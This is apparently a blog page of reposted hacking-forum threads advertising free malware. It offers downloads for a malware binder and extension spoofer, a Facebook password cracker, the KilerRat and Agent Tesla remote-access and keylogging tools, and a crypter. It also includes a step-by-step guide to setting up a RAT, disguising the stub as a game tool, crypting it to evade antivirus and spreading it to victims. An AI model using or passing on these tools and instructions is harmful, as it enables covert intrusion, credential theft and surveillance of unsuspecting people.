Showing posts with label Hacking Tools. Show all posts
Showing posts with label Hacking Tools. Show all posts

Wednesday, 11 May 2016

[UST - FREE] Binder | UD Downloader | Icon Changer | Extension Spoofer | Pumper

Still struggling to spread?
You should give Office Exploit Builder V5 a try.. Hide your virus inside a DOC/XLS file!

[Image: EHHS8X0.gif]


Today I've decided to release something to community for free.
UST is a simple tool to help users spread, I have listed the features of this tool below.
  • UD Downloader - Download your EXE file and spread via USB & RAR/ZIP. Disable common windows features (Run, CMD, Registry, Control Panel, TaskManager, etc).
  • Binder - Bind any files together.
  • Icon Changer - Change any EXE files icon.
  • Spoofer - Spoof the extension of any file, hide your virus in a JPG, AVI, etc.
  • File Pumper - Increase file size by MB.

Example:
Here is an example of what the tool can do, I took an EXE file compiled by the downloader, changed the icon, spoofed the extension and pumped it with a few megabytes.

[Image: rcPOCsv.png]

Screenshot:

[Image: HAyse2e.png]

Download:

Please reply to the thread before/after downloading!

http://officeexploitbuilder.com/files/UST.rar

[Image: EHHS8X0.gif]

AddMeFast Bot | Working | **1000 Points an Hour & Extra**

Scripts included in this package :

1) AddMeFast FaceBook followers.
2) AddMeFast FaceBook Page Likes.
3) AddMeFast FaceBook Post Likes.
4) AddMeFast FaceBook Post Share.
5) AddMeFast FaceBook Share.
6) AddMeFast InstaGram Followers.
7) AddMeFast InstaGram Likes.
8) AddMeFast Pinterest Followers.
9) AddMeFast Pinterest Likes.
10) AddMeFast Reverbnation Fans.
11) AddMeFast Twitter Followers.
12) AddMeFast Twitter Re-Tweets.
13) AddMeFast Twitter Tweets.
14) AddMeFast YouTube Likes.

Extra

Youtube Mass Video Unlike

~ FREE | Qraken V1.1 ~ Facebook Cracker | HACK FACEBOOK | MODULAR | GUI | FREE ~

[Image: qrakenmain_1.jpg]

Hello. I've been here since '09 and this is my first release. A multi-cracker/bruteforcer. 

Features: 

- Multi-threaded
- Proxy support
- Facebook suport (as of 11/21/15)
- Instagram coming soon (11/27/15)
- Twitter coming soon (11/27/15)
* IMPORTANT NOTE: Qraken will ONLY work with 64-bit computers!*
EDIT: I made a mistake and sent everyone a wrong version.
Please download again, I added a download link in first post aswell as an updated virus scan. I apologize


[Image: fbmodule_1.png]

Updates: 

Code:
11/21/15: Qraken V1 Released
11/22/15: Qraken V1.1 Released
FIX: Crashes, memory leaks
ADD: Auto-updater

Virus Scan:

VirusTotal

Download:

Mediafire

Useful Links:

Trial Proxies

RockYou Big Word List
Note:

I am not responsible for anyone getting banned. Use low threads, high quality proxies. 

*My tools are and ALWAYS will be FREE

Facebook Fake Inboxer v 1.0 [A KIND OF FACEBOOK HACKING]

so basically what is does?
it inbox people from anyaddreess to any address

A KIND OF FACEBOOK HACKING

SCREENSHOTS
[Image: IsJI8.jpg]
VIRUSSCANCLEAN
http://virusscan.jotti.org/en/scanresult...c41f8780c8
DOWNLOAD

HERE
THANKS TO ORIGINAL THREAD WRITER

Friday, 15 April 2016

[GUIDE] How to Setup RAT [DNS/Portforward/VPN]

Introduction

This thread is for the people new to RATTing looking for a new RAT and wondering how to set it up, or the people that have already bought a RAT and are going "Now What?". Keep reading if you are interested in learning more about this topic and get your RAT up and running.

What you need
A RAT - NanoCoreLuminosity LinkIM4, etc. *RAT SUCH AS DARKCOMET ARE OUTDATED AND NOT RECOMMENDED
DNS - FagDNS, No-IP (NOT RECOMMENDED), etc.
VPN (optional but recommended) - 143 VPN(Coupon code: C2WX3YTN23 $20 Lifetime), RA4W VPN, etc.
Common Sense :)

DNS Setup
First things first you need a DNS, what a DNS does is it redirects your traffic to the IP you are currently using. This is very important if you are planning on using a VPN so that no matter what IP you are using, the DNS redirects the clients to you.

To start off, you need a HQ DNS that keeps no logs, most are paid but one I recommend is FagDNS, it's free and easy to use. I do not recommend No-IP as they keep logs and will rat you out to the feds if they think something is going on.

For this guide I'll use FagDNS but it should be similar on other DNS. To make a DNS you need to think of a creative and unique token and enter it in 'Your Token' then agree to everything and click Login/Register.

[Image: 56689b5dc9e17f72ecba304512af4744.png]

You have to first choose a host name, you can choose whatever you want because this isn't going to matter, it's only an address that's going to be used to point to your IP. If you're using No-IP be sure to choose no-ip.biz as the suffix. Your IP should automatically be in the box in both FagDNS and No-IP, so once you have picked a DNS host name click create. It might take a bit of time for the DNS to get setup and redirect to your IP

[Image: 4e07f80bc9a48b841f5c8ed22bd6428d.png]

When you are using a VPN, be sure to visit FagDNS, log into your account with your token, and update the IP to your current public IP, if you don't know how to find your public IP, just go to: http://www.ipchicken.com/ and you should see it.

No-IP:
If you're using No-IP, get No-IP DNS Update Client (DUC) from here: http://www.noip.com/download?page=win
After it's installed you want to open it, sign in with your No-IP credentials then click 'Edit Hosts', lastly tick the host you have just added and then click save.

*To test if your DNS is working and routing traffic, open up cmd and type 'ping examplehostname.fagdns.com' without the ' and replace examplehostname with your host name and if it's online it should ping back. As I mentioned before, it might take some time to get the DNS set-up and running so don't be worried if it takes a couple of minutes to an hour.

Port Forwarding (Not needed if you're using a VPN)
*SKIP THIS STEP IF YOU WILL BE USING A VPN

Go on the Start menu and type in 'cmd' then open it. When the terminal shows up enter 'ipconfig' (don't type the '), then look for Default Gateway. It should have something like 192.168.1.1 or 192.168.0.1 or 192.168.1.254 write it down or copy it into notepad.

Open up a web browser and type in that IP and sign in when it prompts for username and password. If you're not sure what that is, try the default user:pass, you can find this easily if you Google your router model along with 'default password' orCLICK HERE, for a default password list for most routers.

[Image: daaac41b99a990b5b3703d1f6dd7e66d.png]

Now that you're in the Router settings go to the Advanced Settings or Application Settings, depending on your router and click 'Port Forwarding' or 'Forwarding', once you're there open a port, it doesn't matter which one but I recommend a 3 or 4 digit one ex. 689. You need to forward that port with both TCP and UDP protocol. Fill in the IP Address area with your computer IP (IPV4 ), it can be found in 'ipconfig' also. Once you're done, remember to tick enabled on both of them and click save/apply. If you're still confused on how to port forward CLICK HERE.

VPN & Portforwarding
* SKIP THIS STEP IF YOU'RE NOT USING A VPN

This step if if you want to use a VPN with your RAT which is generally a good idea no matter what you're doing with it. First you want to get a VPN, DO NOT get a VPN that keeps logs. Also make sure your VPN supports portforwarding, I recommend both 143 VPN and RA4W VPN if you are looking to buy relatively cheap ones (both have lifetime deal for under $25). They both keep no logs and offer portforwarding.

Now lets move on to actually port forwarding with the VPN. I will be using 143 VPN for this guide but it should be similar on most VPNs. There are two methods you can port forward, you can do it from within the client (if it's supported) or you can do it on the website. I prefer to use the client because it is more convenient. So first open the VPN, go to the port forwarding section, then type your username (for 143 VPN it's your email) and password if it asks for them, choose the server you want to forward the port on, type in the port, then click open port. It should display a message saying the port has been opened if you did it correctly.

[Image: b0bec9fc81877a757e24ba84faca54cb.gif]

Setting up your RAT
This is the easiest step out of them all. You first want to open up your RAT, for this guide I'll be using NanoCore. Once it's open go on your port manager, add the port you portforwarded on your Router or VPN in the steps above by either right clicking and choosing 'add port' or clicking the 'add port' button. Then right click on the port and click enable or whatever your RAT says.

[Image: 262f127d28e31829dc4d7c0d56aaf0a8.gif]

Now your RAT is configured to get the clients that connect through that port. Last is the most important step, and that is making your stub. Without this you have no way of spreading your server to others and getting clients. Go on builder/builder settings on your RAT. Type in a name for what you will identify them as, for example if your program is supposed to be a 'Minecraft Premium Account Generator' name this Minecraft, just so you can remember what server of yours they ran, this isn't important or necessary but good for keeping clients organized.

Next fill the Connection Host with your DNS host name that you created (ex. examplehostname.fagdns.com) and enter the port that you forwarded either on the VPN or the Router into the Connection Port box. If you want the server to startup when the computer starts, you can tick the 'Run Client when the computer starts' but it's not recommended if you will be using a Crypter, it's better to use the Crypter's startup options.

[Image: 6d0f298e4e5f8888d4427840d002dfe1.png]

Crypting (Optional but recommended)
If you don't want your stub to get detected it's recommended to use a Crypter, otherwise the victims Antivirus will detect your stub and get rid of it before it even executes. If you need a free Crypter check out Prism Lite Crypter which has updates very frequently to re-FUD or Enigma Crypter or if you want your stub to be Fully Undetectable (FUD) you can buy a HQ Crypter from the cryptography section here in HF! I'd suggest CyberSeal since it's a great Crypter but you have to take some time to experiment with the settings such as assembly, icons, startup, etc.

It's very important to test out how well your Crypted server does against AV's, you can do this by going to online virus scanning sites, but it's important to use ones that DO NOT distribute your scans, if you do your server will be picked up by more AV's faster and lose it's FUD. If you want to test out the detection rate of your server and want to use non distributing services, use the following sites VirusCheckmateAnonScanMaJyxRazorScanner. Sites that distribute your scans and ARE NOT recommended for use are VirusTotal & NoDistribute.

That's it! You're all set, now all you have to do is spread your stub.

(THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY, I WILL NOT BE HELD RESPONSIBLE FOR WHAT YOU DO WITH THIS KNOWLEDGE OR ANY DAMAGE IT HAS CAUSED)

Monday, 4 January 2016

TESTMYBIN.COM | | Online Virtual Machine | | Test your stub | | IP Logs | |



What is this?

TMB (Test My Bin) is a virtual environment where you can safely (NO FILE DISTRIBUTION) check if you have the correct setup for your RAT.

You can choose between two OS's (Windows XP and Windows 7), and all machines have .net framework 2 and 4 installed.

How do I use it?

Using TMB is pretty straight forward, submit a new file and follow the instructions. 

Furthermore, we have a good tutorial HERE.



Recent Updates:

  • !HOT! Network Connection Log - List all the IP:Port the file submited has connected to!
  • Disabled Windows XP Temporarily.
  • Added Donation Button and Top Donators list with options to advertise one link/service.
  • Added reCaptcha to prevent spamming.
  • Added what number in queue you are. Each file should take 1 minute so you can do the math :)

To Do:

  • Install/Startup Tests with OS Reboot
  • Persistence Tests

Sunday, 3 January 2016

[FREE RAT] KilerRat V 10.0.0 NOW AVAILABLE

REE RAT KilerRat V 10.0.0 NOW AVAILABLE

NEW RELEASE V10.0.0 - https://www.sendspace.com/file/1f6byq 

[Image: hTQElp.jpg]

I have always been an NjRat fan but beside the fact that is is super fast it is now considered old and it does have limited functions compared to RATS these days. 

NjRat was one of the first RATS I used, learnt with and I still think a lot of it. I have come across a RAT coded from the NjRat source code with more functions called KilerRat and I want to give back to the community. You have helped me a lot so I wanted to share it with you all.

[Image: Vp7dmq.jpg]

[Image: vtyWio.jpg]

[Image: MNlD64.jpg]

[Image: ziCX5j.jpg]

I have done a little research into it, tested it and have put together this thread for anyone that wants it for FREE. I will provide details of the RAT's functions below as well as the latest two downloads for anyone that wants them.

The first version V8.09 has been checekd by Armada. Please see this link for the therad where I asked armbada to check the file below:

http://hackforums.net/showthread.php?tid=5084998

I also have a vouch from offa_rex who provided me with the source of the links and he assures me that its is clean. 

He is a HF friend and a HQ guy so thanks to him for finding it for me. BTW he also offers a FREE .NET Crypting service which works on NjRat, LL, IM etc. I am yet to see if it works on KilerRat but check out his thread.

http://hackforums.net/showthread.php?tid=5050327

I have used both the versions of KilerRat the analysed one and the latest update and had no problems with it. If any other HQ member wants to analyse
the latest file please do. If you find any issues contact me and I will ofc update the thread accodingly but I dont think there should be any
problem at all.

UNDER THE CONTROL CENTER:

File Manager 
Process Manager
Remote Desktop
Remote Cam 
Remote Shell
Registry
Keylogger
Get Passwords
Victim Proxy
Send Msgbox 
Run From Link
Run From Disk
Run Script
Format System 
Open Website
Block Website
DDOS Attack
Open Chat
Spread in Hard Drive
Restart 
Shutdown 
Update Server
Uninstall Server
Restart Server
Close Server
Disconnect Server
Rename Server
Open Folder
Builder
No-ip - Integrated with no-ip ( I DO NOT RECCOMEND YOU USE THIS)
Exe to convert jpg - Allows the attacker to SPOOF an exe to a jpg, score, mp3, wav, txt mp4 or flv file

BUILDER

Host - Specifies Command and Control server.
Port - Specifies Command and Control server listening port.
Victim Name - Specifies prefix the victims appear with in the portal.
Executable Name - Specifies malware name when it makes a copy of itself.
Directory - Specifies which directory to copy the malware to when executed, options include %TEMP%, %AppData%, %User Profile%, and %Program Data%.
MsgBox After Run - Specifies what string to display in a text box after the malware runs successfully for the first time.
USB Spread - Option to spread via USB devices
Protect Process - Option to cause the victim’s system to BSOD if the malware process is killed.
Registry - Prevents the registry from being opened. (Buggy, sometimes you can still get accessS)
Copy StartUp - Option to place the malware in the windows start up
Delete Archives - Option to delete archives
Spread Hard Disk
Anti Taskmgr - This option prevents the Task Manager from being opened on the victim’s computer.
Scheduled Tasks - Add malware into scheduled task (may be buggy)
Short Cut - Creates a short cut when the malware is installed MsgBox After Run - Option to display the MsgBox after installation.

DL LINK Version V8.0.9 https://www.sendspace.com/file/dlpr2d

DL LINK Version V9.0.6 https://www.sendspace.com/file/znj6ap

DL LINK Version V9.0.6 (FULL FIX UPDATE) https://www.sendspace.com/file/v48zo8 (Zip Pass is the name of the developer - Ahmed.Ibrahim)

Ref Source: https://www.alienvault.com/open-threat-e...n-left-off

(The product has been developed further since the release reviewed in this article)

This prodcut is not owned by me or developed by me and is purely for educational purposes. I hope this helps some of you out so please enjoy.

Monday, 2 November 2015

[Release][Source][Free]PowerCrypter~Most Advanced Crypter On The Web



PowerCrypter

PowerCrypter is a crypter that uses an advanced "cold storage" and mutex function. It takes the binary you choose to crypt, reads its bytes, adds an EOF footer and then appends several random bytes. It takes this byte array and converts it to base64 it then compiles a small script that it stores in a temporary directory that is designed to take the base64 and decrypt it back to a byte array. Then the helper script recompiles the executable and saves it with a random name and runs it. Once that script is made, the crypter creates a batch file to run the helper script. Then it creates a file full of random characters. It then takes all three of these files(the helper script, the launcher batch file, and the file of random characters) and uses iexpress to package the files again. The crypter then takes the compiled package executable and copies it next to the original file.

Here are some screenshots of the program in action(please don't hate on my use of teamviewer thx):

"Screenshots": http://1drv.ms/1H9Uqjv

VirusTotal:


GitHub(Download):

Full Package:


Source:


Binaries:


I hope you guys enjoy! Remember...if you love it...donate!

[DirectDL NOW][Spread Kit]|| - Extension Spoofer and File Pumper - ||4 Warez||GREAT||

Maintains file size when compressed!

Scroll down for direct link!
A simple little tool I made to help with my spreading. Thought I would spread the love and release it for free. Hope it helps someone other than me.
Was never fine tuned for release so please PM any bugs you find.

SPOOF--
Spoof any file extension using the windows character exploit. 
[Image: extension_Exploit.png]

AND BEEF--

Make your server appeal more to warez and torrents by appending data to a file to increase it's size. No loss 
of pumped file size when compressed by WinRar. I thought KB and MB would be all that is needed.

[Image: ca32imil.41v.png]

All using one simple program. Even supplied some nifty little help text.

Result--> [Image: cmejo455.jyh.png]


Two in One "Spoof and Beef"

[Image: 1jfyxsio.hbz.png]



Post => Then download

and no. Before you troll. Virus Scan 

Spoiler (Click to Hide)
Scan report


A-Squared - OK
AVG Free - OK
Ad-Aware - OK
AntiVir (Avira) - OK
ArcaVir - OK
Avast 5 - OK
BitDefender - OK
BullGuard - OK
COMODO Internet Security - OK
Clam Antivirus - OK
Dr.Web - OK
ESET NOD32 - OK
F-PROT Antivirus - OK
F-Secure Internet Security - OK
G Data - OK
IKARUS Security - OK
Immunet Antivirus - OK
K7 Ultimate - OK
Kaspersky Antivirus - OK
MS Security Essentials - OK
McAfee - OK
Norman - OK
Norton Antivirus - OK
Panda Security - OK
Quick Heal Antivirus - OK
Rising Antivirus - OK
Solo Antivirus - OK
Sophos - OK
Trend Micro Internet Security - OK
VBA32 Antivirus - OK
VIPRE - OK
Vexira Antivirus - OK
VirusBuster Internet Security - OK
Zoner AntiVirus - OK
eTrust-Vet - OK

Filename: BeefNSpoof.exe (214.5 KB)
Detections: 0 / 35 (0 %)
Scan date: 27-08-2012 (GMT +2)
SHA1 checksum: e245362c4338919e45536380553618d3db10a3b4

Scan report generated by Blackshades Scanner

Thursday, 29 October 2015

[FUD][FREE] Agent Tesla [Keylogger] [ClipboardLogger] [On-Screen Keyboard Logger]



[Image: Ml3rkN.png]
[Image: Qgo9Qk.png]
[Image: XYr597.png]
[Image: b4dWk8.png]
[Image: dqAR84.png]
[Image: 5R1BLR.png]
[Image: AYdpn0.png]
[Image: 02oQl8.png]

Result: (0/60)
A-Squared(Emisoft AntiMalware) Clean - Nothing Found
Agnitum Clean - Nothing Found
AhnLab V3 Internet Security Clean - Nothing Found
ArcaVir Clean - Nothing Found
Avast Clean - Nothing Found
Avg Clean - Nothing Found
Avira Clean - Nothing Found
Ad-Aware Clean - Nothing Found
Baidu AV Clean - Nothing Found
BitDefender Clean - Nothing Found
BKav Clean - Nothing Found
BullGuard Internet Security Clean - Nothing Found
ByteHero Clean - Nothing Found
ClamAv Clean - Nothing Found
Comodo Clean - Nothing Found
Dr. Web Clean - Nothing Found
eScan Clean - Nothing Found
eTrust-Vet Clean - Nothing Found
eScan Internet Security Suite 14 Clean - Nothing Found
ESET NOD32 Clean - Nothing Found
Fortinet Clean - Nothing Found
Fprot Clean - Nothing Found
FSB Antivirus Clean - Nothing Found
F-Secure Clean - Nothing Found
Gdata Clean - Nothing Found
Ikarus Clean - Nothing Found
Immunet Antivirus Clean - Nothing Found
IObit Malware Fighter Clean - Nothing Found
K7Ultimate Clean - Nothing Found
Kaspersky Internet Security 2013 Clean - Nothing Found
KingSoft Clean - Nothing Found
Malwarebytes Anti-Malware Clean - Nothing Found
mcafee Clean - Nothing Found
Microsoft Security Essentials Clean - Nothing Found
nProtect Clean - Nothing Found
NANO Antivirus Clean - Nothing Found
Netgate Clean - Nothing Found
Norton Internet Security Clean - Nothing Found
Norman Clean - Nothing Found
Outpost Security Suite Pro Clean - Nothing Found
Ozone AV Clean - Nothing Found
Panda Antivirus Clean - Nothing Found
Panda Cloud Clean - Nothing Found
PC Tools Clean - Nothing Found
Quick Heal Clean - Nothing Found
SUPERAntiSpyware Clean - Nothing Found
Solo Clean - Nothing Found
Sophos Clean - Nothing Found
TotalDefense Clean - Nothing Found
Trendmicro Internet Security Clean - Nothing Found
TrustPort Antivirus 2014 Clean - Nothing Found
Twister Antivirus 8 Clean - Nothing Found
Unthreat AntiVirus BE Clean - Nothing Found
Vba 32 Clean - Nothing Found
Vexira Clean - Nothing Found
Vipre Internet Security 2013 Clean - Nothing Found
VirIT Clean - Nothing Found
Webroot Clean - Nothing Found
Zillya Clean - Nothing Found
Zoner Clean - Nothing Found
360 Clean - Nothing Found

Filename: eqawe.exe
File MD5 Hash: 4da845e096a139ea240a90e344694928
File SHA1: 2f487abaa5fb17da21af597783ba275c3ed7927e
File Size: 216576 Bytes
Time Scanned: 4-11-14, 04:23:30
Scan provided by RazorScanner
Link to Scan: http://razorscanner.com/result.php?id=629806

Features
[+] %100 FUD
[+] .NET 2.0
[+] server~200kb
 
[+] Auto Update
[+] Save Options
[+] SMTP 
[+] HTML Log
[+] Save Log: It can save logs without internet connection. When internet connected it can send collected logs with subject "Saved Log"

[+] Keyboard Hook (All characters)
[+] Clipboard Hook
[+] On-screen Keyboard Hook
[+] Screenshot

[Assembly]
[+] Assembly Changer
[+] Assembly Cloner
 
[+] Icon Changer
 
[Stealer]
[+] Chrome
[+] IExplorer
[+] Firefox
[+] Opera
[+] FileZilla
[+] IMVU
[+] Pidgin
[+] FlashFXP
[+] SmartFTP
[+] CoreFTP
[+] FTPCom
[+] NO-IP
[+] Paltalk
[+] DynDNS
[+] Yahoo
[+] MSN
[+] Steam
[+] JDownloader
 
[File Binder]
[+] Multi File Binder
[+] All Extension
[+] "Just one time" Option

[Installation]
[+] Injection (RunPE)
[+] Add Startup (hide from msconfig) (Bypass UAC)
[+] Hide File
[+] Persistance
[+] Melt File
[+] Delay Execution
[+] Kill Process
 
[Options]
[+] Block Anti-Viruses
[+] Protected Process (Bypass UAC)
[+] Block Rightclick (Bypass UAC)
[+] Kill Taskmanager
[+] Kill CMD
[+] Kill Regedit
[+] Kill System Restore
[+] Disable Taskmanager
[+] Disable CMD
[+] Disable Run
[+] Disable Registry
[+] Disable System Restore
[+] Disable Control Panel
[+] Disable MSConfig
[+] Disable Folder Options
 
[+] Downloader
[+] File Pumper
[+] Extension Spoofer
 
[Fake Message]
[+] Header
[+] Message
[+] Style
[+] Button
 
[Web Options]
[+] Host Edit
[+] Web Filter (Bypass UAC)
 
[+] Add UAC Manifest

username: beta
password: beta

Zip password: agenttesla

P.S.1: Please close all AV!
P.S.2: Please dont use Virustotal, jotti etc...

Latest Version v2.4.7
-Changed function of melt file. %100 work.
-Stub %100 Fully Undetectable (FUD)
Copyright © 2014 The Hacks Master